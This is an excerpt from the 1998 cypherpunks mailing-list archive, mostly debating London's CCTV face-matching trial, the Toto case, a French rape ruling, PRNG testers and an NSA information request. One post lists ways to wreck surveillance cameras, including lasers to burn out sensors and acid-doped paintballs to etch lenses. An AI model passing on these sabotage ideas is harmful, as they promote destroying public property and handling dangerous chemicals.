>planned and installed. Then it would be easy to determine the weak
>points. If each camera had to be guarded there would be a *huge* problem
>just keeping the systems alive. 

Well probably the most effective way is to just take out the command and
control center. Even this would only be temporary as the government would
just keep spending more tax money to replace everything and add more
security.

What we need is a mechanism to punish the politicians who go down the Big
Brother path *and* the companies who are making big profits helping them. 

IMHO the UK, and the rest of Europe, is a lost cause, it's sheeple are too
brainwashed (FWIW the US is not far behind). The wall in Berlin did not
come down because Communism is dead, it came down because the Communist
were in control on both sides. :(

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Friends don't let friends use Windows.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNi4h4o9Co1n+aLhhAQGlUgQAr3oGl4sEuSmrVG5jq8kt9bQs/atT8zCS
03kn4/mkJ4MhYHKqx805lTQll/fVgdq7uePC6vDeJYnKHHRxXEiWDkX+KQz3IFdw
ZnjEjCWlG249ZsrsSS+auB/LBgEYJRVNEgHIVvDVCsoSMLC8m3JVN3AUG7trLOG0
iwDz8Y3/kS8=
=Jbv/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 21 Oct 1998 14:09:29 +0800
To: coderpunks@toad.com
Subject: ignore my mail coz I'm through with it
Message-ID: <Pine.GSO.3.96.981021133931.28759B-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
To: cypherpunks@toad.com, coderpunks@toad.com
Subject: desperate....


 
Could you give any info about wireless transmission especifically 
satellite transmission.
 
Thank you and I desperately need your help.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 23 Oct 1998 23:14:30 +0800
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: Break DES Fast!
In-Reply-To: <36309E91.6A5F6688@stud.uni-muenchen.de>
Message-ID: <Pine.BSF.3.91.981021141103.9684A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Fri, 23 Oct 1998, Mok-Kong Shen wrote:

> Peter Gutmann wrote:
> > 
> > Dear Friend,
> > 
> > My name is Dave Rhodes.  In 1997 my cipher designs had all been broken, my
> 
> I don't know the English term but in my native language what is
> described is call 'chaining letters', supposed to be a method to
> become rich very rapidly. That was illegal, though.
> 
> M. K. Shen
> 
> 

I don't know what your native language is, but in english, what is 
described is known as a joke. ROFLMAO.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Griffiths <griffith@wis.weizmann.ac.il>
Date: Wed, 21 Oct 1998 20:57:00 +0800
To: cypherpunks@toad.com
Subject: Women cannot commit rape?
Message-ID: <362DD16D.2B1A6570@wis.weizmann.ac.il>
MIME-Version: 1.0
Content-Type: text/plain



French Supreme Court rules that women cannot commit rape

Copyright (c) 1998 Nando.net
Copyright (c) 1998 Reuters News Service

PARIS (October 21, 1998 06:38 a.m. EDT http://www.nandotimes.com) -
France's
Supreme Court ruled on Wednesday that women are unable to commit the
crime of
rape because they cannot sexually penetrate men.

"The material element of the crime of rape is only realized if the
perpetrator
commits the act of sexual penetration on the person of the victim," it
said in
its judgment.

The court, known as the Cour de Cassation, overturned a lower court
ruling
that Catherine Maillard could be tried for rape on charges of forcing
her
underage stepson to have sex with her repeatedly between 1986 and 1992.

Maillard could only be tried for "aggravated sexual aggression" against
the
boy, while his father Michel Deloisy had to be tried for "moral
abandonment of
a child" instead of the original charge of "complicity in aggravated
rape,"
the court said.

With its judgment, the court seemed to contradict an earlier ruling it
issued
in December 1997 saying that forcing someone to perform oral sex act was
legally equivalent to rape.


--
Tim Griffiths                   griffith@wis.weizmann.ac.il
Center for Submicron Research   http://tim01.ex.ac.uk
Weizmann Institute of Science   (972)-8-934-2736
Rehovot 76100 Israel
PGP Public key available - finger tim@tim01.ex.ac.uk

The real value lies not in what I say or do,
but in your reaction to it.  -DF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Griffiths <griffith@wis.weizmann.ac.il>
Date: Wed, 21 Oct 1998 21:01:34 +0800
To: cypherpunks@toad.com
Subject: UK police chase crooks on CCTV
Message-ID: <362DD1B0.4EF8AE03@wis.weizmann.ac.il>
MIME-Version: 1.0
Content-Type: text/plain



The Associated Press via The Wash. Post, Oct 17, 1998
http://search.washingtonpost.com/wp-srv/searches/mainsrch.htm#ap

Chasing Crooks on Closed Circuit TV
http://search.washingtonpost.com/wp-srv/WAPO/19981017/V000263-101798-idx
.ht ml


LONDON (AP) -- An ``intelligent'' computer system that uses closed
circuit television to match faces in a crowd to mug shots of known
criminals is likely to become London's latest weapon against crime.

Scotland Yard and a local council have installed the $100,000 CCTV
system on a trial basis in Newham, a poor district in London's East End.

Newspapers reported Thursday that the computer system, called Mandrake,
is linked to 144 CCTVs in Newham's shopping centers, railway stations
and car parks and can scan up to 150 faces at a time and compare them
with a database of criminals stored on a computer at the council's
headquarters.

If there is a match between a face in the crowd and a known criminal,
the computer alerts a monitoring team in the town hall, who in turn
alert the police.

Civil liberties groups said they were alarmed by the new system, but
police defended its use.

``The only people entered on to the system will be convicted criminals
who, through our intelligence, we believe are habitually committing
crimes in the area,'' The Daily Mail quoted police Chief Superintendent
Dave Armond as saying. ``If people are not committing crime they have
nothing to fear, but if they are among the small minority who are, the
message is, 'We are watching out for you.'''

The newspaper reported that police initially will use the system to
concentrate on catching robbery suspects. In the future, however, it
could be used to search crowds for hooligans who stir up trouble at
soccer matches.

CCTV's developer, Software and Systems International, says the system is
accurate enough to discern people hiding behind make-up or eye glasses.
And growing a beard won't help either, the company says.

Britain has 150,000 close circuit television cameras. While most Britons
appear happy the devices are being used to tackle crime, civil liberties
groups oppose both the cameras and the facial matching.

``The accuracy of facial mapping like this is limited. You only need a
handful of photographs of celebrities to see how different the same
people can look in different pictures,'' the Mail quoted Liz Parratt,
spokeswoman for Liberty, a civil rights group, as saying. ``Even if you
did have a system which worked, it would have to be regulated very
carefully to protect people's privacy.''

 \ Copyright 1998 The Associated Press


--
Tim Griffiths                   griffith@wis.weizmann.ac.il
Center for Submicron Research   http://tim01.ex.ac.uk
Weizmann Institute of Science   (972)-8-934-2736
Rehovot 76100 Israel
PGP Public key available - finger tim@tim01.ex.ac.uk

The real value lies not in what I say or do,
but in your reaction to it.  -DF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: X1 <rsriram@krdl.org.sg>
Date: Wed, 21 Oct 1998 15:50:57 +0800
To: cypherpunks@toad.com
Subject: PRNGs and testers.
Message-ID: <19981021151835.A26267@krdl.org.sg>
MIME-Version: 1.0
Content-Type: text/plain




Hi,

A few questions on Pseudo Random Number Generators...

1. Which are the best software PRNG's available today? 

2. Are there any software implementations to test the randomness of a
   PRNG ? I've looked at Diehard - is there anything else?

Thanks,
R Sriram.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 22 Oct 1998 00:39:56 +0800
To: cypherpunks@toad.com
Subject: Re: UK police chase crooks on CCTV
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F8505@MSX11002>
Message-ID: <199810211559.RAA22447@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



  >> ...the system...is based on recognising facial structure

  > Maybe a full beard would change the apparent width of the whole
  > head...

You mean
   "When beards are outlawed, only outlaws will have beards." ?

-- FuzzyMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Wed, 21 Oct 1998 18:48:54 +0800
To: cypherpunks@cyberpass.net
Subject: Re: My (Vince's) citizenship renunciation made difficult
In-Reply-To: <000101bdfc93$c6846780$218195cf@blanc>
Message-ID: <362E5F5F.EDBF2695@workmail.com>
MIME-Version: 1.0
Content-Type: text/html




 
Blanc wrote:
(And Soren:   integrity and morality are
not incompatible; in fact, they
co-exist and where one is reduced, the other is also diminished).
 
"How I found Freedom in an Unfree World -- Harry Browne", puts it more
succinctly than I.  I think this was a case of using morality in place
of ethics.  Anyone got a Webster's or Oxford around?
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 22 Oct 1998 09:08:55 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: The Trouble With Harry (fwd)
Message-ID: <199810220056.TAA05317@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: 22 Oct 1998 00:20:03 -0000
> From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
> Subject: The Trouble With Harry

> John Young <jya@pipeline.com>:
> 
> >Can you tell more about the lack of support from Austin cpunks,
> >any change, or are you left to fend for yourself?
> 
> tis is why i am not a cypherpunk. you people have
> no care for your fellow man! first jim bell, then
> toto, now choate, soon youll all be gone....

Hold on hear a second, let's get the facts straight.

I am NOT being accussed of anything. I have been asked to act as a witness
for the prosecution (not explicitly the target thereof). Unfortunately for
the prosecutions case, I'm not a witness to anything relevant. If I were
aware of some kook running around building bombs with the intention of using
them on people, their property, or animals I'd be the first to turn their
nutty butts in.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph 'Anonymous' Howe" <nobody@privacy.nb.ca>
Date: Thu, 22 Oct 1998 09:27:23 +0800
To: cypherpunks@cyberpass.net
Subject: The latest news from Toto
Message-ID: <199810220055.VAA32173@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain



I got a letter from Toto today, and he's doing well. Or at least as well
as one can under his circumstances.

He has a few friendly requests, though, which I'm not necessarily in any
position to respond to.

* Does anyone have an RSA-in-perl t-shirt (or sweatshirt, or whatever)
to spare? He wants the Well Dressed CypherPunk Defendant Look (TM) in
court.

* Declan McCullagh: Congratulations, you've been added to the visitors'
list.

* Oh, yeah! If someone could mail me copies of the FPP stuff, it would be
nice, since the Shrink Rapper has copies and I don't. (The IRS is sending
it to him as part of his punishment for laughing at my jokes...)

If anyone knows what he's referring to, reply to the cpunks list and I'll
get in touch personally, or just mail it to him directly.


MailMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 22 Oct 1998 12:14:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The latest news from Toto
In-Reply-To: <199810220055.VAA32173@privacy.nb.ca>
Message-ID: <v04020a25b254452456fa@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:55 PM -0400 on 10/21/98, Joseph 'Anonymous' Howe wrote:


> * Declan McCullagh: Congratulations, you've been added to the visitors'
> list.

Walk softly and carry a big printing press, Declan. God speed.

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carlos Macedo Gomes <gomes@www.navigo.com>
Date: Thu, 22 Oct 1998 11:31:35 +0800
To: cypherpunks@einstein.ssz.com
Subject: FW: rules of engagement (fwd)
Message-ID: <Pine.LNX.3.95.981021213346.7499A-100000@www.navigo.com>
MIME-Version: 1.0
Content-Type: text/plain



> From:	Adam Back [SMTP:aba@dcs.ex.ac.uk]
> Clearly I think one should be able to say wtf one wants to, and in
> general I endeavor to do just that.  But I am suggesting that
> cypherpunks individually stear clear of grey areas, such as say
> creative tax minimisation, Duncan Frissel style "it's not illegal to
> do blah with social security numbers", Tim May style "I've got X
> number of now illegal armament Y", (unless you also have the money for
> good lawyers) and so on, whether technically legal or not, as one
> would be taking above average risks in doing so, because governments
> are watching this list, and a number of it's subscribers.

I agree with Adam on sticking to legally achievable goals-- or at least
legally achievable without needing unlimited funds to feed the army 
of lawyers that will be needed to keep you and your cohorts out of prison.
To me that would include the realm of projects related to strong crypto,
electronic cash, anonymity and privacy-- vague as those topics may be.

That said... I was at the meeting in July with Jim when Toto showed up.
It was my first attendance at an Austin Cpunk meeting and I was looking
forward to working on some great projects with some hopefully great
local folks.  To me Toto showing up was simply a very interesting road
sign (or graffiti) on the path to achieving pragmatic, long-living
"cypherpunks write code" projects the first of which was to be
the Crypto Conference that we were hoping to host and that we were
discussing at that meeting with members of EF Texas.  BTW: Whatever
happended to the Classified Ad project??

Jim fought for that but it fell apart when the focus of the conference was 
was moved by another local group to a non-crypto topic.  We took the
synergies from the remains of conference project and started work on a
Cypherpunks meta-web-archive this time with a joint effort by myself, some
fellow programmers and the Austin Cpunks.  This project as well started
strong out of the gates but lost steam around the first corner.  In part
it was due to looming, work related project deadlines-- as far as I
know none involved in the local projects are retired, Austin hitech
fatcats (yet).  But mostly this last project and the local meetings
halted I think due to Jim's relating to the group the events that were
happening with him regarding Toto.

I think the really sad thing here is not that we didn't rise up as a
group to stop the government's inquiries of Jim with regards to the
Toto case but simply that we individually offered very limited support
directly to Jim himself.  And from speaking with Jim and reading his
emails it appears that the support was in the form of a referral to
lawyers (who apparently were not ready to do any _pro bono_ work) and an
apology from myself for lack of offer of assistance when it became obvious
to me that the long standing local group had not offered assistance.

I think Jim did a great job with the local group and it's truly a sad
indictment against the relationships we had (or thought we had) in the
group where our "sponsor" is put in a spotlight for acting as a primary
for the group that we're supposedly active in and there's no show of
support...  Again, not with intent to support Toto, or thwart government
inquiries, but just to check to see how Jim's doing under the strain of
possible government scrutiny.

Anyhow the local group does look to be dead.  I'd still like to get group
coding projects and the like accomplished while I'm in Austin and suspect
they will still happen and hopefully with Jim and some of the other local
folks involved.  But I don't think there will be an "Austin Cpunk" group
after this.  I'd be glad to have someone prove me wrong.

That's my $0.02 on the events of the past few months.... Now back to
reality.

waves,
C.G.

--
Carlos Macedo Gomes
gomes@navigo.com
a Navigo farmer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Elliott <k-elliott@wiu.edu>
Date: Thu, 22 Oct 1998 12:11:39 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: Women cannot commit rape?
Message-ID: <v04020a01b2545c1062c9@[143.43.245.6]>
MIME-Version: 1.0
Content-Type: text/plain



>French Supreme Court rules that women cannot commit rape
>
>Copyright (c) 1998 Nando.net
>Copyright (c) 1998 Reuters News Service
>
>PARIS (October 21, 1998 06:38 a.m. EDT http://www.nandotimes.com) -
>France's
>Supreme Court ruled on Wednesday that women are unable to commit the
>crime of
>rape because they cannot sexually penetrate men.

This is true in the United States as well.  That's why in every state,
technically speaking, their is no crime of "rape" just varying degrees and
types of "criminal sexual assault".  I'm suprised that hasn't trickled down
to france yet.  Rape is defined as forcing someone to have sexual
intercourse.  It doesn't take much imagination to build an argument that
you can't force a man to have sex, after all he had to get aroused.  The
advantage of criminal sexual assualt is that it side steps these kind of
issues by greatly broadening the crime to basicly forcing/manipulating
someone  to engae in any kind of sexual activity.


___________________________________________________________________________
"DOS/WIN based computers manufactured by companies such as IBM, Compaq,
Tandy, and millions of others, are by far the most popular, with about 70
million machines in use worldwide. Macintosh fans, on the other hand, note
that cockroaches are far more numerous than humans, and that numbers alone
do not denote a higher life form." - New York Times

-Kevin "The Cubbie" Elliott <mailto:k-elliott@wiu.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 22 Oct 1998 12:23:54 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Women cannot commit rape? (fwd)
Message-ID: <199810220410.XAA05986@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 21 Oct 1998 22:50:50 -0500
> From: Kevin Elliott <k-elliott@wiu.edu>
> Subject: Re: Women cannot commit rape?

> This is true in the United States as well.  That's why in every state,

I don't believe that is accurate. Just about 2 years ago two women were
sentenced to prison because they kidnapped and raped a man.

Perhaps one of the more versed in case law members might remember it.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 22 Oct 1998 12:55:52 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: FW: rules of engagement (fwd)
Message-ID: <199810220438.XAA06083@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 21 Oct 1998 22:47:40 -0500 (CDT)
> From: Carlos Macedo Gomes <gomes@www.navigo.com>
> Subject: FW: rules of engagement (fwd)

> discussing at that meeting with members of EF Texas.  BTW: Whatever
> happended to the Classified Ad project??

It was going along fine until I made the mistake of asking when....

I'd offered a couple of dates, nobody ever commented on them.

I can still cover Austin, Dallas, Houston, San Antonio, Fort Worth, El Paso.
A single paper in each city.

I'd say do it like Thanksgiving Day or Christmas. I need 1 months warning.

It might be kind of cool to put regular ads in with various comments like the
1st Amendment, or questions regarding civil liberties, famous quotes, etc.
Just sign it,

Cypherpunks


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Thu, 22 Oct 1998 08:57:19 +0800
To: cypherpunks@toad.com
Subject: The Trouble With Harry
Message-ID: <3240b953a758fc51b6540fd49f3a5618@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



John Young <jya@pipeline.com>:

>Can you tell more about the lack of support from Austin cpunks,
>any change, or are you left to fend for yourself?

tis is why i am not a cypherpunk. you people have
no care for your fellow man! first jim bell, then
toto, now choate, soon youll all be gone....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Thu, 22 Oct 1998 00:12:46 +0800
To: cypherpunks@toad.com
Subject: RE: UK police chase crooks on CCTV
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F8505@MSX11002>
Message-ID: <3.0.5.32.19981022012456.00848250@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



Just read Jim Choates reply to this, Ken Browns prompts my reply.

Jim Brown mentioned the use of soccer hooligans to justify the widespread
use of mounted cameras- and face matching software technology in the UK-,
and how use of large sunglasses, hats, scarves, false mustaches or beards
might complicate that identification. I would further add that, if knowing
such implements were in use, or upon seeing such devices, some persons
might be inclined to keep their face turned down, or away, to further
complicate identification by such a system.

This is what gets me.

Is a government training its populace to walk about with face directed at
the ground 5 feet in front of? To be afraid of holding the head upright? To
dissuade noticing the guards patrolling the fence, to ignore the overt
threat and implication this implies?

Are we (they) really training a generation to fear authority, to cow to,
and bow down to it without a fight? 

We are stationing some people in your house, to keep an eye on the
suspected crack house across the street.

OK.

We are mounting a camera on the corner of your house, to keep an eye on the
corner down the way- never mind that it can swivel 270 and watch everything
in the neighborhood. 

OK.

We are mounting a camera in your house, with microphones, because we have
heard x and y and z.

OK.

Sheesh.

It is enough to make a person paranoid, if s/he wasn't already.

Reeza!

	Fear has a scent and Money has a color,
	but Stupid walks right up and slaps you in the face,
	
	Every time.

						-- me, I think.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Thu, 22 Oct 1998 02:41:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: UK police chase crooks on CCTV (fwd)
In-Reply-To: <362E110F.30CA@lsil.com>
Message-ID: <362ECBF9.E7E50ED0@workmail.com>
MIME-Version: 1.0
Content-Type: text/html




Michael Motyka wrote:
Technical:
Briefcase-sized EMP - fun idea but I don't know how to make it workable.
HV generator on the end of a stick - not too tough.
High power LASER to burn out CCDs - buy anonymously, nice, works from
a
safe distance.
What's needed are moles to leak detailed info on systems as they're
planned and installed. Then it would be easy to determine the weak
points. If each camera had to be guarded there would be a *huge* problem
just keeping the systems alive.
 
Low tech:
Paintball guns, doped with fluoric acid to etch the lens.  Works
well on speed cameras.
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Thu, 22 Oct 1998 02:55:51 +0800
To: cypherpunks@cyberpass.net
Subject: Separation of Socialism and State amendment
In-Reply-To: <199810211803.NAA010.65@geiger.com>
Message-ID: <362ECF7F.E5E00744@workmail.com>
MIME-Version: 1.0
Content-Type: text/html




William H. Geiger III wrote:
 
Well probably the most effective way is to just take out the command
and
control center. Even this would only be temporary as the government
would
just keep spending more tax money to replace everything and add more
security.
What we need is a mechanism to punish the politicians who go down the
Big
Brother path *and* the companies who are making big profits helping
them.
Simple check and balance alternative #4:
    Receive a buck of public funds as income, lose your
right to vote due to conflict of interest.  This applies to all civil
servants, politicians, military personnel, LEAs, welfare recipients, subsidy
recipients, medicare recipients, social security recipients, incarcerated
prisoners (they already have it)  -- and any others who have a vested
interest in the continuance of the gravy train. Hereafter referred to as
the 'Separation of Socialism and State amendment'. Perhaps they could all
form a union and tax each other for their common good.  Actually,
when you read the wording of the tax code, this is exactly what was intended
(http://www.tax-freedom.com), and is, in fact, the law.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 22 Oct 1998 18:25:50 +0800
To: Michael Motyka <whgiii@invweb.net>
Subject: RE: UK police chase crooks on CCTV (fwd)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F850A@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



> William H. Geiger III[SMTP:whgiii@invweb.net] wrote (among other
> stuff):
> 
> 
> What we need is a mechanism to punish the politicians
> who go down the Big Brother path *and* the companies
> who are making big profits helping them. 
> IMHO the UK, and the rest of Europe, is a lost cause,
> it's sheeple are too brainwashed

The best bit of news of the last few days is Pinochet's arrest. It
lifted my heart. Almost made up for the all 
the bad stuff the UK government has been coming out with. 
(Also it brought Thatcher out of the woodwork. Like a large segment of
the British Tory party she really is/was an authoritarian, 
paying lip-service to the Free Market for political reasons. You can
tell them by the company they keep.) 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tanya D. Smith" <tdsmith@phoenix.Princeton.EDU>
Date: Thu, 22 Oct 1998 18:36:34 +0800
To: cypherpunks@toad.com
Subject: Recent biometrics discussion
Message-ID: <Pine.GSO.4.03.9810220546410.10964-100000@flagstaff.Princeton.EDU>
MIME-Version: 1.0
Content-Type: text/plain




Hi,

A member told me about the discussion of biometrics going on recently.
I'm doing a research project on biometrics and would be really interested
in reading through those postings.

Could someone please point me to the archive where I can find recent 
postings about biometrics?

Thanks.

Tanya 

-- Have I not commanded you?  Be strong and courageous!  Do not tremble or 
   be dismayed, for the Lord your God is with you wherever you go.
                                                           Josh. 1:9




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 22 Oct 1998 19:08:26 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The latest news from Toto
In-Reply-To: <199810220055.VAA32173@privacy.nb.ca>
Message-ID: <199810220821.JAA22656@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




MailMonger forwards Toto's request:
> I got a letter from Toto today, and he's doing well. Or at least as well
> as one can under his circumstances.
> 
> He has a few friendly requests, though, which I'm not necessarily in any
> position to respond to.
> 
> * Does anyone have an RSA-in-perl t-shirt (or sweatshirt, or whatever)
> to spare? He wants the Well Dressed CypherPunk Defendant Look (TM) in
> court.

What size would he like, where would he like it sent to (or should one
of his visitors hand it to him to increase his chances of getting it?).
Sweatshirt or t-shirt?

Adam

(This month's key:)

Type Bits/KeyID    Date       User ID
pub  2048/2E17753D 1998/10/04 Adam Back <aba@dcs.ex.ac.uk> (FS key, Oct 98)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzYXjq0AAAEIALVr4nBhPNtqtAsXbjrJg4crJ3CllDZfRi/cTdpFd6T6y4UE
FnKrKy+Vth81kLJ3MorE35dwuMzyDne+vP7XA3pyfUiFU2P4/q625gQ6Yxio6BUh
M/qUoap/4gK60i7BOP2dfJy2WwhfOU2RS9HdMJ6ERjrzdCJv5Z7UXYJmUvWa08xk
C55yL6NtFdRgVVPgMPO1kz6zoSVDqOHrmmXR22dBrRhJAUld9+yH2SvNwAY5j5sQ
dVdD1hK+8JNXQx3HbZoZpz7ZW/nmEjyjBvV7kktKgRAxQwHZ9ijchvcoTPNKZK/l
NIq35t4oO+RIx572OWfdH34j/OkrgKcBxy4XdT0ABRO0LUFkYW0gQmFjayA8YWJh
QGRjcy5leC5hYy51az4gKEZTIGtleSwgT2N0IDk4KYkBFQMFEDYXjuQ+e8qoKLJF
UQEBRrQIAKVSMd5s/osd8dCGoGYvyuHBOpUFZQSMREtQw/0/Z34uNNUBRnXSGeAS
LjZd9BHu9CebqJMaFWjtCCe7DU+JljxfSvD7CwsBdt56aZz2vwl9rxJR9lwBnAwM
twlJcOxfzVgHL+NL4VG0ukT1hQMqrkZts/0t+LzV3ulgVwis7w4/MATzLZZU/i4W
wAGhOB2Q9HD0Rh2uBe/ktB/ndJQF+uxNRxcY8PyK9Q3oFztl5DMu1ue4mOH3iOJH
u2OOQzQeJ0kCn4r3eCR1bOqlGyEeOJMVs54/eAOHQPXiqHIsZ76zujNL5kxx5JNw
U/KL71KTUwwDwPJpyV2gVCUa+or0YTE=
=S4OD
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 23 Oct 1998 01:38:47 +0800
To: cypherpunks@Algebra.COM
Subject: Re: PRNGs and testers.
Message-ID: <362F6571.1F81@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



>Hi,
>
> A few questions on Pseudo Random Number Generators...
>
> 1. Which are the best software PRNG's available today?
>
> 2. Are there any software implementations to test the randomness of a
>    PRNG ? I've looked at Diehard - is there anything else?
> 

I found Bruce Schneier's paper on PRNGs at http://www.counterpane.com
somewhat eye-opening.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 22 Oct 1998 23:42:27 +0800
To: cypherpunks@toad.com
Subject: NSA Info Sought
Message-ID: <199810221447.KAA15188@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



An international television corporation seeks current or 
former National Security Agency employees and/or military 
members willing to provide information on the NSA base at 
Menwith Hill, England, and other operations of the US's 
global electronic surveillance and interception program.

E-Mail: jy@jya.com

JYA/Urban Deadline
251 West 89th Street, Suite 6E
New York, NY 10024
Tel: 212-873-8700
Fax: 212-799-4003

Anonymous and encrypted messages welcome.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.2 for non-commercial use <http://www.pgp.com>


mQGiBDUT1GoRBAD96qrjqMjIZK30XrvsEgsDssidjh4gjxoM3XZwYvjuNqohFUYC
W6ktcjtHkITXeCP0leprRByF4LIZZp75JrR/FODnpELnTQwzQ03kD/OTRBl+m2ED
/3N4T29KwwKdvEvfoKgJ8UYrAb4nS5F7W26kiKAIslpIIKBSdMCWszoBRwCg/ydS
4PuvY6YJMbHc3Ir0OpW9NZ8EANM9K1c7OKDOQEriJOtYqlwd//qKP2GQLvq7Kdel
/fjZRKBDW3vRRJZvNkTpMN44eRz2wJxuQh1Jjqj/RWO7+KkeJF1ftVhWcC3kzmBa
7HX2CXmFX2Y+/Fqk1nyzDh2hD5nDidYS4uDMgNfAKs8WBVqWY9l9rHmX3LvoKIUP
WYGWBADFmYF5n+6LMwnrEWJb3/G/LPTz8bupjZAX3pk7JAysJjwet1ZRfN356RuF
8p4ia4BY8evpmwG0ICW0skrzPf6EelOGef7RpQN+4CSTHaF2lsMe4PFfQSI9c7lP
vGG74byiiR7V9BpWR6yhsB18FZhrCXkp44HQTFEbqbDbKwB3krQdSm9obiBZb3Vu
ZyA8anlhQHBpcGVsaW5lLmNvbT6JAEsEEBECAAsFAjUT1GoECwMCAQAKCRCDRF/O
eTbvYJ2pAJ0cPHIxXi8h0tbgWOH9NgPof7uH7QCfee3M2/PHjS59s5KTLHi1qrHu
